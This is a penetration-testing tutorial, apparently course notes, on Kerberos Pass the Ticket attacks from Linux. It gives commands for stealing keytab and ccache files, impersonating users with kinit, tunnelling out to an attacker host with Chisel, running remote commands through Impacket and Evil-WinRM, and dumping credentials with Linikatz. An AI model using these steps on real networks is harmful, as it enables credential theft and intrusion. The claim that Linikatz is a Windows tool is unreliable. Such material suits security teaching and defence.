PtT - Pass the Ticket from Linux

This section will cover Pass the Ticket (PtT) attack from a Linux system.

Overview
- Kerberos on Linux
Identifying Active Directory in Linux
Finding Kerberos Tickets
- Keytab Files
- ccache Files
Abusing KeyTab Files
- Extracting Keytab hashes with KeyTabExtract
Abusing Keytab ccache
Using Attack Tools
- Gaining Access
- Using Impacket-WMIExec
- using Evil-WinRM
Converting Tickets
- Importing Converted Tickets into Windows
Linikatz

Overview

Linux systems can also connect to an Active Directory environment. A Linux device connected to Active Directory commonly uses Kerberos for authentication.

Assuming it is using Kerberos, we can attempt to find tickets to impersonate other users to gain more access to the network.

Kerberos on Linux

Linux uses the same process to request a Ticket Granting Ticket (TGT) and Ticket Service Ticket (TGS). However, the way it is stored may vary depending on the Linux distribution and implementation.

In most cases, Linux machines will store the Kerberos tickets as ccache files in the /tmp directory. By default, the location of the Kerberos ticket is stored in the environment variable called KRB5CCNAME.

Another location will be keytab. A keytab is a file that contains pairs of Kerberos principals and encrypted keys which are derived from the Kerberos password. We can use this file to authenticate to various remote systems using Kerberos. However, when a password is changed, the keytab file has to be recreated.

Identifying Active Directory in Linux

We can use a tool called realm to check if the Linux system is in an Active Directory domain or not.

Realm is a tool used to manage system enrolment in a domain and set which domain users and groups are allowed access to the local system resources.

realm list

Command breakdown:

list - List the domain details.

If realm is not available, we can use tools such as sssd or winbind. These services can indicate if a system is in a domain. We can use commands such as ps to check if the services are running.

ps -ef | grep -i "winbind\|sssd"

Finding Kerberos Tickets

Kerberos tickets can be found in many different files in Linux. This section will cover keytab and ccache.

Keytab Files

We can use the find command to look for files which contains the word keytab. When an administrator creates a Kerberos ticket to be used with a script, it will usually set the extension to .keytab.

find / -name *keytab* -ls 2>/dev/null

Command breakdown:

/ - Specify to search the entire directory.
*keytab* - Specify to look for all files that contains the word keytab.
-ls - List the file details.
2>/dev/null - Send all errors to /dev/null.

Another way to find keytab files will be in Cronjobs. We can use either commands to view cronjobs.

crontab -l
cat /etc/crontabs

If the system is in a domain, we might find a script using kinit. kinit allows interaction with Kerberos. Its function is to request the user's TGT and store the ticket in the cache (ccache file).

ccache Files

A credential cache (ccache) file stores Kerberos credentials while they are valid and until the user session ends. Once a user authenticates to a domain, a ccache file is created that stores the ticket information.

The path is placed in the KRB5CCNAME environment variable. This variable is used by tools that supports Kerberos authentication to find its data. We can use the env command to view the variable.

env | grep -i krb5

We can also look for the ccache file in /tmp as it is its default location.

Abusing KeyTab Files

We can impersonate a user using kinit. To use a keytab file, we will need to know which user it was created for. We can use klist to view this information.

klist is another application used to interact with Kerberos on Linux. It reads information from a keytab file.

klist -k -t

Command breakdown:

-k - List keytab entries instead of the credentials cache.
-t - Show the timestamps for each entry.

Once we have identified which user the ticket belongs to by looking at the principal name, we can impersonate the user with kinit.

kinit <Principal name> -k -t /path/to/keytab_file

Command breakdown:

<Principal name> - Specify the principal name of the user to impersonate.
-k - Speicfy to use a keytab file instead of a password.
-t /path/to/keytab_file - Specify the path to the keytab file.

An example will be:

kinit myuser@ACORP.LAN -k -t /opt/specialfiles/myuser.keytab

Once impersonated, we can perform tasks such as accessing SMB shares. An example will be using smbclient to access a share.

smbclient //<computer name>/<share> -k -c <command>

Command breakdown:

<computer name> - Specify the computer name or IP address of the target.
<share> - Specify the share to connect to.
-k - Use Kerberos authentication.
-c ls - Specify to run a command.

Note: To keep the ticket from the current session, save a copy of the ccache file in the KRB5CCNAME environment variable before importing the keytab.

Extracting Keytab Hashes with KeyTabExtract

We can attempt to extract the keytab file and crack the hash by using a script called KeyTabExtract.

Once the script is on the target system, we can use the following command.

python3 keytabextract.py /path/to/keytab_file

An example will be:

python3 keytabextract.py /opt/specialfiles/myuser.keytab

The script will output information such as the domain, service principal, encryption type, and hashes.

If we have the NTLM hash, we can perform a Pass the Hash attack. With a AES256 or AES128 hash, we can forge tickets using Rubeus or attempt to crack it to obtain the password.

Abusing Keytab ccache

To abuse a ccache file, we will need read privileges on the file. These files can only be read by the user who created them. However, if we have root privileges, we can use them.

We will first need to identify which tickets are present on the machine, who they belong to, and the expiration time. We can view the tickets by using the ls -la /tmp command as the files are stored in /tmp by default.

To use the ccache file, we can copy the file and assign the file path to the KRB5CCNAME variable.

cp /tmp/<file to copy> /path/to/copy/to
export KRB5CCNAME=/path/to/copied_file

An example will be:

cp /tmp/krb5cc_647401106_I8I133 /root/
export KRB5CCNAME=/root/krb5cc_647401106_I8I133

Once exported, we can view the ticket information using the klist command.

Do note that once the expiration date has passed, the ticket will not work. ccache files are temporary and may change or expire if the user no longer use them during login and logout.

Using Attack Tools

There are several tools that can allow us to interact with Windows and Active Directory. If we are attacking from a machine in a domain, will need to ensure that the KRB5CCNAME variable is set to the ccache file that we want to use.

If we attacking from a machine that is not in the domain, we will need to make sure we can contact the KDC or domain controller and ensure that DNS is working.

We can use tools such as Chisel and Proxychains to connect to a KDC/DC if we do not have direct access.

Gaining Access

To start, modify the /etc/hosts file with the Fully Qualified Domain name (FQDN) of the domain controller and other target machines.

An example will be:

10.42.0.22 acorp.lan acorp dc.acorp.lan dc
10.42.0.30 ws1.acorp.lan ws1

Once modified, we will need to modify the proxychains configuration file to use socks5 and port 1080.

We can do this by adding the following to the /etc/proxychains.conf file.

[ProxyList]
socks5 127.0.0.1 1080

Once added, we can download and use the Chisel. To download Chisel, we can use the apt install chisel on Kali Linux. Once downloaded, we can run Chisel.

chisel server --reverse

Command breakdown:

server - Start the Chisel server.
--reverse - Enable reverse tunnelling.

Once setup, we can use tools such as xfreerdp or rdesktop to connect to our target. An example will be using xfreerdp.

xfreerdp /v:<Target IP> /d:<domain> /u:<username> /p:<password> /dynamic-resolution

Command breakdown:

/v:<Target IP> - Specify the target IP address.
/d:<domain> - Specify the domain.
/u:<username> - Specify the username to use for authentication.
/p:<password> - Specify the password to use for authentication.
/dynamic-resolution - Enable dynamic resolution updates.

Once connected, we can download Chisel to the target machine and run the following command.

chisel.exe client <Attacker IP>:8080 R:socks

Command breakdown:

client - Start Chisel in client.
<Attacker IP> - Specify the attacker's IP address.
R:socks - Set up a reverse SOCKS proxy.

An example will be:

chisel.exe client 10.42.0.2:8080 R:socks

Finally, we will need to transfer the ccache file of the user that we want to impersonate from the Linux machine and create a environment variable called KRB5CCNAME with the value being the copied file on the attacker's machine.

Example of setting the environment variable:

export KRB5CCNAME=/home/<user>/krb5cc_647401106_I8I133

Using Impacket-WMIExec

To use the ticket, we will need to specify the target machine name and use the -k option. We can optionally use the -no-pass option if we are prompted for a password.

proxychains impacket-wmiexec dc -k

Using Evil-WinRM

We can also use Evil-WinRM with Kerberos. For it to work, we will need the Kerberos package used for network authentication which can be installed using the apt install krb5-user command on Kali Linux.

Once installed, we will need to get the domain to our target domain (realm) and the administrative server to the domain controller's name. We can modify the configuration file in /etc/krb5.conf.

An example will be:

[libdefaults]
        default_realm = ACORP.LAN

[realms]
    ACORP.LAN = {
        kdc = dc.acorp.lan
    }

Once configured, we can use the following Evil-WinRM command.

proxychains evil-winrm -i <target name> -r <domain>

Converting Tickets

If we want to use a ccache file in Windows or a kirbi file on Linux, we can use a tool called Impacket-ticketConverter to convert the files to their respective formats (ccache file to .kirbi on Windows and vice versa for Linux).

impacket-ticketConverter <ccache file> <output name>.kirbi

Command breakdown:

<ccache file> - Specify the ccache file to convert.
<output name>kirbi - Specify the output file name.

Importing Converted Tickets into Windows

We can use Rubeus to import the tickets.

rubeus.exe ptt /ticket:<path to ticket>

Replace <path to ticket> with the full path to the ticket.

Linikatz

Similar to Mimikatz, Linikatz is made to be used on Windows by Cisco. It can be downloaded from the following link:

https://github.com/CiscoCXSecurity/linikatz

This tool will extract all credentials such as Kerberos tickets from different Kerberos implementations from different services and save them to a directory with the name starting with linikatz.

To use the script, run ./linikatz.sh.

Table of Contents​

Overview​

Kerberos on Linux​

Identifying Active Directory in Linux​

Finding Kerberos Tickets​

Keytab Files​

ccache Files​

Abusing KeyTab Files​

Extracting Keytab Hashes with KeyTabExtract​

Abusing Keytab ccache​

Using Attack Tools​

Gaining Access​

Using Impacket-WMIExec​

Using Evil-WinRM​

Converting Tickets​

Importing Converted Tickets into Windows​

Linikatz​

Table of Contents

Overview

Kerberos on Linux

Identifying Active Directory in Linux

Finding Kerberos Tickets

Keytab Files

ccache Files

Abusing KeyTab Files

Extracting Keytab Hashes with KeyTabExtract

Abusing Keytab ccache

Using Attack Tools

Gaining Access

Using Impacket-WMIExec

Using Evil-WinRM

Converting Tickets

Importing Converted Tickets into Windows

Linikatz